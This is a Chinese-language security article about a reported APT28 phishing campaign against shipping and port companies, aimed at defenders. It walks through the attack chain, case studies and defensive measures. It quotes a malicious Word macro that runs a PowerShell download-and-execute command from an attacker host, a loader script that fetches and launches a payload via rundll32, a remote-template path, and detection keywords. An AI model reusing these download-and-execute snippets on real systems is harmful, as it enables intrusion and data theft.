一、从“提单更新”到内网沦陷：一场精心策划的数字伏击

2025年11月下旬，一家位于鹿特丹港的中型航运代理公司收到一封看似寻常的邮件：“您的提单（B/L No. HLCU2511887）因海关新规需补充信息，请查收附件并尽快确认。”

发件人显示为“Customs_Notification@europort-logistics[.]eu”——一个与欧洲主要港口命名风格高度一致的域名。附件是一个名为“HLCU2511887_Supplement.doc”的Word文档。操作员双击打开后，弹出提示：“此文档包含宏，是否启用？”出于对“海关流程”的熟悉，他点击了“启用内容”。

几秒后，他的电脑后台静默下载了一个PowerShell脚本，并通过Windows Management Instrumentation（WMI）注册了一个持久化任务。不到24小时，攻击者已横向移动至公司内部的货运调度系统，窃取了未来两周内数十艘货轮的靠泊计划、货物清单及客户联系人数据。

这并非孤立事件。据国际海事媒体Maritime Fairtrade于2026年1月初披露，与俄罗斯军事情报总局（GRU）有关联的高级持续性威胁组织 APT28（又名Fancy Bear、Sofacy），正在发动一场横跨欧洲、美洲与亚洲的全球性钓鱼行动，重点锁定航运、港口运营、物流及供应链企业。其目标不仅是商业机密，更可能涉及国家关键基础设施情报乃至军事后勤动向。

二、APT28为何盯上海事？地缘博弈下的“数字航道”

APT28自2004年活跃至今，以针对政府、军方、选举机构和能源企业的精准打击闻名。此次将矛头转向海事领域，背后有深刻的战略逻辑：

全球90%的贸易依赖海运，港口是经济命脉的“咽喉”；

航运数据包含货物类型、起讫港、承运方、收货人等敏感信息，可推演供应链脆弱点；

军用物资常混杂于民用货轮运输（如美军“预置舰”计划），掌握船期即掌握潜在军事部署窗口；

港口工业控制系统（ICS/OT）若被渗透，可造成物理层面的瘫痪——如2021年伊朗沙希德·拉贾伊港遭网络攻击导致连续数日停摆。

“这不是普通的商业间谍行为，而是国家级情报战在民用基础设施上的延伸。”公共互联网反网络钓鱼工作组技术专家芦笛指出，“APT28选择海事，是因为这里既有高价值数据，又有相对薄弱的网络安全防线。”

据公开威胁情报（来源：Mandiant、Recorded Future、ESET），2025年Q4以来，APT28至少针对德国汉堡港、美国长滩港、新加坡PSA码头、中国宁波舟山港周边物流服务商等数十个实体发起定向钓鱼。

三、攻击技术深析：老手法+新伪装=高成功率

尽管APT28此次行动在底层技术上并未使用全新漏洞，但其社会工程与行业定制化能力达到新高度。整个攻击链可分为四个阶段：

第一阶段：高度情境化的钓鱼投递

攻击邮件主题紧扣海事业务场景，包括：

“【紧急】船期调整通知 – MSC Mediterranean Service”

“海关查验要求：请补充HS编码文件”

“港口安全通告：所有代理需完成在线培训”

“运费账单异常，请核对附件”

发件人域名经过精心构造，例如：

maersk-security[.]net（仿冒马士基）

cosco-document[.]org（仿冒中远海运）

apm-terminals-update[.]com（仿冒APM码头）

部分邮件甚至伪造真实提单号、集装箱编号，使收件人难以分辨真伪。

第二阶段：Office宏+远程模板注入（RTF/DOCX）

附件多为Word或Excel文档，启用宏后执行以下典型载荷：

' 恶意VBA宏代码（简化版）

Sub AutoOpen()

Dim cmd As String

cmd = "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://cdn-docs[.]xyz/loader.ps1')"

Shell cmd, vbHide

End Sub

更隐蔽的手法是利用Word远程模板注入（Remote Template Injection）——文档本身无宏，但通过\\attacker\share\template.dotm加载外部恶意模板，绕过部分EDR对宏的检测。

“很多企业以为禁用宏就安全了，但远程模板、OLE对象、DDE链接等旧特性仍是盲区。”芦笛解释。

第三阶段：轻量级初始载荷与C2通信

下载的PowerShell脚本通常极简，仅用于建立C2通道。例如：

# loader.ps1

$wc = New-Object System.Net.WebClient

$payload = $wc.DownloadData("hxxps://storage.googleapis[.]com/fake-cdn/update.bin")

$proc = Start-Process -FilePath "rundll32.exe" -ArgumentList "advpack.dll,LaunchINFSection",$payload -PassThru

该载荷会注入合法进程（如dllhost.exe、msdtc.exe），并通过DNS隧道或HTTPS伪装成正常云服务流量（如模仿OneDrive、SharePoint API）与C2服务器通信。

部分样本甚至使用合法协作平台作为C2中转，如通过GitHub Gist、Pastebin或Telegram Bot下发后续指令，极大提升隐蔽性。

第四阶段：横向移动与持久化

一旦立足内网，APT28会迅速执行：

凭证窃取：使用Mimikatz抓取内存中的NTLM哈希；

域枚举：通过BloodHound分析Active Directory拓扑；

部署后门：如Sofacy自研的GAMEFISH或X-Tunnel后门，支持模块化插件扩展；

OT网络渗透：若IT与OT网络未隔离，尝试通过SCADA协议（如Modbus TCP）访问码头起重机、闸口控制系统。

四、国际案例复盘：从欧洲港口到亚洲物流枢纽

案例1：德国汉堡港代理公司数据泄露（2025年10月）

攻击者发送“欧盟碳关税（CBAM）申报指南”PDF，实则为LNK快捷方式，诱导用户执行PowerShell命令。成功渗透后，窃取了包括大众汽车零部件进口计划、西门子工业设备出口清单在内的敏感数据。

案例2：美国东海岸物流商遭供应链投毒（2025年12月）

APT28伪装成FedEx发送“包裹清关失败”通知，附件为Excel表格。启用宏后，部署Cobalt Strike Beacon，并以此为跳板攻击其客户——一家国防承包商，试图获取军用物资运输记录。

案例3：东南亚港口IT服务商被控（2025年11月）

针对新加坡、马来西亚多家港口IT外包公司，APT28发送“港口EDI系统升级测试邀请”，诱导安装含后门的“测试客户端”。该客户端实则为远程访问木马（RAT），可长期监控港口作业指令流。

五、国内警示：中国港口与供应链面临同样风险

尽管Maritime Fairtrade报道聚焦欧美亚多地，但中国作为全球第一大货物贸易国，拥有十大世界级港口中的七席，自然成为APT28等组织的重点关注对象。

事实上，国内安全团队早在2025年第三季度就监测到类似活动：

仿冒“宁波舟山港集团”发送“船舶靠泊计划调整”邮件；

伪造“中国外运”通知，声称“危险品申报缺失”，附带恶意DOCX；

针对长三角、珠三角中小型货代公司，利用“RCEP原产地证更新”话术投递钓鱼附件。

“中国海事生态的特点是‘大港强、小企弱’。”芦笛分析，“大型港口集团防护较严，但大量中小物流、报关、仓储企业安全投入有限，成为攻击者的‘低垂果实’。”

更值得警惕的是，部分攻击已开始本地化中文内容，甚至引用真实政策文件（如《港口危险货物安全管理规定》），增强欺骗性。

六、防御体系构建：从邮件网关到OT隔离

面对APT28这类国家级对手，传统防病毒软件已远远不够。专家建议采取以下纵深防御措施：

1. 邮件安全强化

禁用Office宏：通过组策略全局禁用，或仅允许签署宏；

阻断远程模板：设置Word信任中心，禁止从Internet加载模板；

部署高级邮件网关：如Proofpoint、Mimecast，启用URL重写、附件沙箱分析；

实施发件人认证：强制SPF、DKIM、DMARC，防止域名伪造。

2. 终端与网络防护

启用应用白名单：通过Windows Defender Application Control（WDAC）限制脚本执行；

网络分段：将OT（操作技术）网络与IT网络物理或逻辑隔离，禁止双向访问；

最小权限原则：一线操作员账户不应具备域管理员权限；

部署EDR/XDR：如CrowdStrike、SentinelOne，监控异常进程注入、WMI事件。

3. 人员意识与流程管控

建立“双通道核实”机制：任何涉及船期、费用、安全的变更，必须通过电话或内部系统二次确认；

开展行业定制化演练：模拟“海关查验邮件”“船公司通知”等场景，测试员工反应；

限制外部附件打开：默认以“保护视图”打开所有来自外网的Office文档。

4. 技术人员参考：检测恶意宏的关键指标

安全工程师可通过以下方式识别可疑文档：

检查VBA项目流：

olevba suspicious.docx

若输出包含AutoOpen、Document_Open、Shell、WebClient等关键词，高度可疑。

监控WMI事件日志（Windows Event ID 5861）：

<!-- 恶意WMI持久化示例 -->

<CommandLine>powershell -ep bypass -c IEX (New-Object Net.WebClient)...</CommandLine>

分析DNS请求异常：

若内网主机频繁查询非常规子域名（如a3f9b2.update.cdn-docs[.]xyz），可能为DNS隧道通信。

七、结语：在数字海洋中，每一封邮件都可能是鱼雷

APT28的全球钓鱼行动揭示了一个残酷现实：在现代混合战争中，港口吊机的控制权，可能始于一封伪装成“提单更新”的邮件。海事行业作为全球化经济的基石，正成为国家级网络攻击的新前线。

“我们不能再把网络安全视为IT部门的事。”芦笛强调，“从报关员到码头调度员，每个人都可能是攻击链的第一环。真正的防线，不在防火墙里，而在每个点击‘启用宏’之前的那0.1秒犹豫中。”

在这场没有硝烟的航道争夺战中，警惕，是最廉价也最有效的护航舰。

编辑：芦笛（公共互联网反网络钓鱼工作组）